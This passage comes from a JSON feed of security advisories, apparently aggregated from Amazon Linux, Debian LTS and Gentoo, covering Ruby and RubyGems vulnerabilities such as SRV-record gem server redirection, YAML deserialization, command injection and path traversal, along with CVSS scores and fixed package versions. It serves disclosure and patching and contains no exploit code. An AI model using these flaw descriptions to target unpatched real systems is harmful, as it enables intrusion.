ruby21-doc-2.1.6-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby21-irb-2.1.6-1.17.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby21-libs-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-bigdecimal-1.2.4-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-debuginfo-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-devel-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-psych-2.0.5-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem21-io-console-0.4.3-1.17.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": "2015-06-16T10:30:00", "type": "amazon", "title": 
"Medium: ruby21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-548", "href": "https://alas.aws.amazon.com/ALAS-2015-548.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T19:12:52", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby20\n\n \n**Issue Correction:** \nRun _yum update ruby20_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-devel-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-debuginfo-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-io-console-0.4.2-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-bigdecimal-1.2.0-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby20-libs-2.0.0.645-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem20-psych-2.0.0-1.27.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 rubygems20-devel-2.0.14-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems20-2.0.14-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby20-irb-2.0.0.645-1.27.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby20-doc-2.0.0.645-1.27.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby20-debuginfo-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem20-psych-2.0.0-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-libs-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-devel-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem20-bigdecimal-1.2.0-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem20-io-console-0.4.2-1.27.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": 
"2015-06-16T10:30:00", "type": "amazon", "title": "Medium: ruby20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-547", "href": "https://alas.aws.amazon.com/ALAS-2015-547.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T19:11:39", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby22\n\n \n**Issue Correction:** \nRun _yum update ruby22_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 rubygem22-io-console-0.4.3-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-devel-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-libs-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-debuginfo-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem22-bigdecimal-1.2.6-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem22-psych-2.0.8-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 ruby22-doc-2.2.2-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby22-irb-2.2.2-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems22-devel-2.4.5-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems22-2.4.5-1.6.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby22-devel-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-libs-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-io-console-0.4.3-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-debuginfo-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-psych-2.0.8-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-bigdecimal-1.2.6-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": "2015-06-16T10:30:00", "type": "amazon", "title": "Medium: ruby22", 
"bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-549", "href": "https://alas.aws.amazon.com/ALAS-2015-549.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2021-10-22T12:53:44", "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u5\nCVE ID : CVE-2016-2337 CVE-2018-1000073 CVE-2018-1000074\nDebian Bug : 895778 851161\n\nSeveral vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\n Type confusion exists in _cancel_eval Ruby's TclTkIp class\n method. Attacker passing different type of object than String as\n "retval" argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\n RubyGems contains a Directory Traversal vulnerability in\n install_location function of package.rb that can result in path\n traversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\n RubyGems contains a Deserialization of Untrusted Data\n vulnerability in owner command that can result in code\n execution. 
This attack appear to be exploitable via victim must\n run the `gem owner` command on a gem with a specially crafted YAML\n file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-27T20:25:50", "type": "debian", "title": "[SECURITY] [DLA 1480-1] ruby2.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2018-08-27T20:25:50", "id": "DEBIAN:DLA-1480-1:C4833", "href": "https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:44:51", "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u4\nCVE ID : CVE-2015-9096 CVE-2016-2339 
CVE-2016-7798 CVE-2017-0898\n CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 CVE-2017-0902\n CVE-2017-0903 CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\n CVE-2017-17405 CVE-2017-17742 CVE-2017-17790 CVE-2018-6914\n CVE-2018-8777 CVE-2018-8778 CVE-2018-8779 CVE-2018-8780\n CVE-2018-1000075 CVE-2018-1000076 CVE-2018-1000077\n CVE-2018-1000078 CVE-2018-1000079\nDebian Bug : 851161\n\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n\nCVE-2016-2339\n\n Exploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\n DoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\n gem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\n RubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim's terminal\n emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. 
A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\n A command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\n Aaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n\nCVE-2017-17790\n\n A command injection vulnerability in lib/resolv.rb's lazy_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n\nCVE-2018-6914\n\n ooooooo_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. (dot dot)\n in the prefix argument.\n\nCVE-2018-8777\n\n Eric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\n aerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if an script accepts an\n external input as the argument of String#unpack.\n\nCVE-2018-8779\n\n ooooooo_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. 
The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n\nCVE-2018-8780\n\n ooooooo_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n\nCVE-2018-1000075\n\n A negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n\nCVE-2018-1000076\n\n RubyGems package improperly verifies cryptographic signatures. A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\n An improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n\nCVE-2018-1000078\n\n Cross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n\nCVE-2018-1000079\n\n Path Traversal vulnerability during gem installation.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-14T06:28:37", "type": "debian", "title": "[SECURITY] [DLA 1421-1] ruby2.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2018-07-14T06:28:37", "id": "DEBIAN:DLA-1421-1:5BC60", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-21T06:06:40", "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\u201cWEBRick\u201d) and a class for XML parsing (\u201cREXML\u201d). \n\n### Description\n\nMultiple vulnerabilities have been discovered in Ruby. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ruby users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-2.2.8\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-18T00:00:00", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2017-10-18T00:00:00", "id": "GLSA-201710-18", "href": "https://security.gentoo.org/glsa/201710-18", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}